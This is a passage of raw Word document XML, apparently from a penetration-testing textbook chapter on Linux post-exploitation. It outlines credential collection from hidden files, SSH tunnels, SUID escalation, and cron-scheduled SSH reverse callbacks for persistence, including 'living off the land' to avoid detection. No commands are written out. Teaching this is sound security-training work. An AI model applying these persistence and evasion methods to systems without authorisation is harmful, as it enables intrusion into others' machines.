        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Collecting credentials from hidden configuration files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355035B3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating tunnels using SSH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128E9AB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automating SSH authentication with scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999368F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using cron jobs to maintain access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF0C4E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gaining higher privileges using SUID binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317C5A7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the previous chapter, we explored three key goals of post-exploitation in Windows systems: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72069625" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintaining access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAFAAA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Collecting credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EEA8D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Moving across systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE9162B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These same objectives apply to Linux and UNIX environments. The main difference is how these tasks are performed. A skilled penetration tester should be able to work across different operating systems, whether it is Windows, Linux, or macOS. Understanding where to find credentials, how to keep access, and how to move through systems is essential in any environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08042C3E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In diagram 1 it shows the main steps after a system is compromised. It starts with Level 1 (initial access) and focuses on three key actions: maintaining access, collecting credentials, and moving to other systems. Access is maintained by using cron jobs to automatically reconnect. Credentials are found by checking bash history, config files, and hidden dot files. These credentials or SSH keys are then used to move laterally and gain access to Level 2 targets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2321F7FA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1F5C70" wp14:editId="3D2A0C5B">
            <wp:extent cx="5065395" cy="2418461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1582" name="Picture 1582"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1582" name="Picture 1582"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5065395" cy="2418461"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69330729" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diagram 1: Post- Exploitation goals  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6ABD3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461AA820" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="145"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc30411"/>
      <w:r>
        <w:t xml:space="preserve">9.1 Maintaining reliable re-entry with cron jobs </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="07B0B1BD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One of the most important goals after gaining access to a system is ensuring that access can be maintained over time. In Linux and UNIX systems, this can be achieved using cron jobs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F5888" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A cron system allows commands or scripts to run automatically at scheduled intervals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C142E14" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These schedules are defined in a file called a crontab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38727B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A common and effective approach is to use built-in system tools instead of external tools. This method is often referred to as “living off the land,” meaning you rely on tools already present on the system to avoid detection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098CC1E3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="25" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6D5D6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In Diagram 2, it shows how persistent access is created on a compromised system using SSH and cron jobs. First, SSH keys are uploaded to the compromised target. Then, a bash script is created that uses these keys to connect back to the attacker’s machine and establish a tunnel. Finally, a cron job is scheduled to run the script automatically at set intervals, ensuring the connection is maintained even if it is lost. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537671AB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3A1F0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1128C678" wp14:editId="6452A10A">
            <wp:extent cx="5943600" cy="1864995"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1639" name="Picture 1639"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1639" name="Picture 1639"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1864995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A982E7A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="209" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagram 2: Setting up an SSH reverse callback script using cron </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3C0AAA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971EE68" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3CCAB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FA180" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C37C32" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B807C0F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B240285" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F819591" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795388B4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B067F7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E912AE6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc30412"/>
      <w:r>
        <w:t xml:space="preserve">Creating a SSH Key Pair </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="32278DED" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating an SSH key is important because it provides a secure way to authenticate users when accessing remote systems. Instead of using passwords, SSH keys use public-key cryptography, which is much harder for attackers to compromise. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C84CE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSH keys improve security because: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFFA627" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They are more secure than passwords and difficult to guess or brute force. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039625C6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They help protect systems from password-based attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233DD4B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They allow secure and automated access to servers and services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD6136" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They verify the identity of the user through the unique key pair. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E471BBA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using SSH keys is a common and recommended practice for secure system access and remote administration. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF7082" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8BFF12" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 1 shows the process of generating an SSH key using the ssh-keygen command with the RSA algorithm. During this process, the system asks where the key should be saved and whether a passphrase should be added for additional protection. After the information is entered, the system creates a private key and a public key. The private key is stored securely, while the public key can be shared with remote systems for authentication. The output also displays a key fingerprint and a randomart image, which represent the unique identity of the generated key. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C53932" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FFCF9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3435" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F8E65B" wp14:editId="77AA1635">
            <wp:extent cx="3895217" cy="2886075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1694" name="Picture 1694"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1694" name="Picture 1694"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3895217" cy="2886075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40088CB6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: Creating a new SSH Key Pair </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AFB0F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E3939" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 2 shows the SSH server configuration file where public key authentication is enabled. After transferring the SSH public key to the system, the SSH service must be configured to allow authentication using that key. In the configuration file, the setting PubkeyAuthentication yes is enabled, which allows the server to accept login attempts using SSH key pairs instead of passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF64A8D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This configuration ensures that when a user attempts to connect, the server checks the public key stored in the authorized_keys file and verifies it against the private key held by the user. Enabling public key authentication strengthens security by reducing the need for password-based login and allowing secure, key-based access to the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996CD08" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4409" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5322F7B3" wp14:editId="7F855F05">
            <wp:extent cx="3270885" cy="2609342"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1728" name="Picture 1728"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1728" name="Picture 1728"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3270885" cy="2609342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49445C29" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Enabling SSH Public Key Authentication on the Attacking Machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9069D5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 3 shows a successful login to the system after SSH was configured. The screen displays the Ubuntu welcome message and information about available system updates. This confirms that remote access to the system has been successfully established. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65390185" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3449" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A9B5095" wp14:editId="736F3114">
            <wp:extent cx="3884295" cy="2171573"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1730" name="Picture 1730"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1730" name="Picture 1730"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
